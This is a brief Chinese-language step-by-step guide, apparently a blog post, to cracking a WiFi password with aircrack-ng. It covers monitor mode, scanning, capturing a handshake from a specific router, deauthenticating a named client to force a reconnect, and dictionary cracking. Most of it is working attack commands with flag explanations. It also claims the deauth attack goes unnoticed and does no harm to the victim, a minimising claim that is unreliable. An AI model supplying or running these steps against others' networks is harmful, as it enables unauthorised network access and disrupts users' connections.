1.无线网卡切换到监听模式 具体参考:https://blog.csdn.net/whatday/article/details/86494254
2.airodump-ng wlan0
列出所有的wifi信号 得到需要**的wifi对应的mac 如图
这里选取 B0:95:8E:9B:7C:E8这个wifi设备
3.airodump-ng wlan0 --ivs -c 6 --bssid B0:95:8E:9B:7C:E8 -w test
抓取wifi的握手数据包 同时使用第4步让指定用户断开 这样拿到握手包
--ivs 是通过ivs过滤,只保留可以**密码的报文.ivs文件,这样比较快点
-c 后面跟频道,如这里的6
-w 是将抓取的报文写入命名为 test 并保存(之后会在当前文件夹保存为test-01.ivs)
4.新开一个shell执行 aireplay-ng -0 200 -c 84:4B:F5:49:53:BA -a B0:95:8E:9B:7C:E8 wlan0
针对指定wifi的mac 指定的用户进行攻击 让用户断开wifi 当用户重连时 第3步中的命令可以抓到握手包
需要注意 由于用户wifi断开后会自动重连 所以用户端基本没有感觉 也不能对攻击用户造成任何影响
-a 是路由器的mac
-c 是需要攻击的用户mac
5. aircrack-ng -w pass.txt test-01.ivs
-w 是字典文件
test-01.ivs 是包含握手包的数据包
如果失败会显示:Got no data packets from target network!
成功会显示: